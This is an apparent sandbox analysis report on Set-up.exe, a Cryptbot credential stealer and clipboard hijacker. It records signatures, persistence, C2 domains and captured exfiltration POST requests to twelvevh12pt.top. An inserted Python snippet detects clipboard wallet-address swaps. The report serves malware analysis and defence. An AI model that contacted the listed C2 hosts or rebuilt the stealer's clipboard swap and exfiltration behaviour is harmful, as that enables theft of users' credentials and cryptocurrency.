Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1520814
MD5: ff8b81c5bdbb09987a4ed216ae0010c2
SHA1: 1d5edf417a676e8e04a69dd94dac6a2a934cdfa6
SHA256: d6a055bee4a39f5879ff522099df86cd0a0001228cac589b3f07449a5a822fef
Tags: Cryptbot, exe, user-4k95m

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection

Source: Set-up.exe.7328.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "+twelvevh12pt.top", "twelvevh12pt.top"]}
Source: Set-up.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B15D0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_004B15D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F14E0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_6C2F14E0
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 4_2_004B8320
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3B6C50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3C9920h 4_2_6C310C40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FED09
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C3BAE90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEE80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C366E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C366FE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F285F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE8E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C312910
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C320971
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C320971
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F297F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F29BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F29FD
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31E9D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C340A30
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2A3C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEA31
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C320A1C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEA97
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2AF1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C320ACC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2B30
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2B6F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C320B7C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FCB40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEB80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 4_2_6C348BE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2BD3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C30C470
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C470
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C50C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31C540
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C540
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C36A5B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31C5DC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C368640
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C368640
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C68C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE700
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE7B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C3127F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3AA030
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31C02C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FC070
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C0DC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C3680C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35C11E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35C11A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31C240
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C35C2DE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31C2DC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C35C2DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C312340
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FC380
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2390
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDC60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC58
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C30DCA0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBCB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31BC90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC9F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C31DCE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBCC7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31BD2C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C363D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBD06
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C38BD70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBDFF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C367DE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDEE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31BEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBED2
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31BF5C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31BF90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31BF90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD8A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FF880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C3598F3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FB8E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3638C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C38B970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C311960
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBA80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDAF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBAD0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 4_2_6C38FB20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBB7B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C367B50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDB90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBBF8
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBBC4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3C801Ch 4_2_6C35F430
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD4C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C33F5A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3575E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C35F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35D67E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35D67A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD645
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C31F6B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD6B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FB750
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C357260h 4_2_6C3573D0

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49733 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49731 -> 185.244.181.140:80
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: +twelvevh12pt.top
Source: Malware configuration extractor URLs: twelvevh12pt.top
Source: Joe Sandbox View IP Address: 185.244.181.140 185.244.181.140
Source: Joe Sandbox View ASN Name: BELCLOUDBG BELCLOUDBG
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary54044084
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 413
    Host: twelvevh12pt.top
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary53892879
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 89642
    Host: twelvevh12pt.top
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary49242685
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 31921
    Host: twelvevh12pt.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: twelvevh12pt.top
Source: unknown HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary54044084
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 413
    Host: twelvevh12pt.top
Source: Set-up.exe, 00000000.00000003.2040016353.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevh12pt.top/
Source: Set-up.exe, 00000000.00000003.2040016353.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevh12pt.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2040016353.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevh12pt.top/v1/upload.php&&
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ehMlFMzYcqQvKbiEUyBC.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30ADD6 CloseHandle,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 4_2_6C30ADD6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30AE52 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C30AE52
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30AF41 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C30AF41
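The clipboard API chains listed above are the clipper's read-then-overwrite cycle: IsClipboardFormatAvailable/GetClipboardData to read what the user copied, then Sleep + GetClipboardSequenceNumber to notice a change and EmptyClipboard/SetClipboardData to replace it. The Python below is an added detection example, not part of the Joe Sandbox report or of the sample: it replays a constructed log of clipboard polls and flags the observable signature of a swap, a wallet-format string replaced by a different string of the same format within a short window. The timestamps, sequence numbers and all address strings are constructed for illustration; the replacement address is not a real indicator.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Syntactic shapes of the wallet addresses a clipper swaps. Format checks only,
# no checksum validation; that is all the heuristic needs.
WALLET_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{39,59}$"),
    "eth":        re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


@dataclass(frozen=True)
class ClipboardSnapshot:
    t_ms: int   # monotonic capture time in milliseconds
    seq: int    # GetClipboardSequenceNumber() at capture time
    text: str   # CF_TEXT payload, "" when the clipboard held no text


@dataclass(frozen=True)
class SwapAlert:
    kind: str
    original: str
    replacement: str
    delta_ms: int


def classify_wallet(text: str) -> Optional[str]:
    """Return the wallet format name for text, or None if it is not an address."""
    s = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(s):
            return kind
    return None


def detect_swaps(snapshots: Iterable[ClipboardSnapshot], max_delta_ms: int = 2000) -> list:
    """Flag clipboard changes where a wallet address is replaced by a different
    address of the same format within max_delta_ms.

    A user re-copying a second address normally takes longer than that; a clipper
    polling GetClipboardSequenceNumber in a Sleep loop reacts within its poll
    interval, so the replacement lands almost immediately after the original copy.
    """
    alerts = []
    last_change: Optional[ClipboardSnapshot] = None
    for snap in snapshots:
        if last_change is None:
            last_change = snap
            continue
        if snap.seq == last_change.seq:
            continue  # polled again, content unchanged
        before, after = classify_wallet(last_change.text), classify_wallet(snap.text)
        delta = snap.t_ms - last_change.t_ms
        if (before is not None and before == after
                and last_change.text.strip() != snap.text.strip()
                and delta <= max_delta_ms):
            alerts.append(SwapAlert(before, last_change.text.strip(), snap.text.strip(), delta))
        last_change = snap
    return alerts


# Constructed poll log. The replacement address is an arbitrary valid-format string, not a real IOC.
SAMPLE_SNAPSHOTS = [
    ClipboardSnapshot(0, 10, "meeting notes"),
    ClipboardSnapshot(500, 11, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),    # user copies their own address
    ClipboardSnapshot(1000, 11, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),   # poll, no change
    ClipboardSnapshot(1300, 12, "1Ez69SnzzmePmZX3WpEzMKTrcBF2gpNQ55"),   # swapped 800 ms later
    ClipboardSnapshot(60000, 13, "0x742d35Cc6634C0532925a3b844Bc454e4438f44e"),
    ClipboardSnapshot(120000, 14, "0x0000000000000000000000000000000000000001"),  # a minute later: legitimate re-copy
]

if __name__ == "__main__":
    for a in detect_swaps(SAMPLE_SNAPSHOTS):
        print(f"[{a.kind}] {a.original} -> {a.replacement} after {a.delta_ms} ms")
```

The 2 s window is an assumed upper bound on the clipper's poll interval; widening it trades false negatives for false positives. On a live host the snapshots would come from a monitor calling GetClipboardSequenceNumber and GetClipboardData on a timer, the same pattern the sample itself uses, which is why sequence-number polling alone cannot distinguish attacker from defender and the timing check is needed.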

System Summary

Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314613760 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B3E80 4_2_004B3E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B5140 4_2_004B5140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C332E93 4_2_6C332E93
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FEE80 4_2_6C2FEE80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C300F20 4_2_6C300F20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C326830 4_2_6C326830
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C352870 4_2_6C352870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C350AA0 4_2_6C350AA0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C306B10 4_2_6C306B10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FCB40 4_2_6C2FCB40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33EB90 4_2_6C33EB90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340020 4_2_6C340020
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3BE230 4_2_6C3BE230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C308260 4_2_6C308260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C332245 4_2_6C332245
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C333C50 4_2_6C333C50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F3D20 4_2_6C2F3D20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FFDC0 4_2_6C2FFDC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C305850 4_2_6C305850
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C34B850 4_2_6C34B850
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3038B0 4_2_6C3038B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C337AB0 4_2_6C337AB0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3B7520 4_2_6C3B7520
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F3580 4_2_6C2F3580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3535D0 4_2_6C3535D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F9790 4_2_6C2F9790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3517F0 4_2_6C3517F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C323180 4_2_6C323180
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BE060 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BDB70 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BFD50 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BDCE0 appears 106 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3B4BD0 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BFE40 appears 65 times
Source: Set-up.exe Static PE information: Number of sections : 18 > 10
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\wYZaUCGaRz Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\yneBJZQGdgAJyOIYcNTc
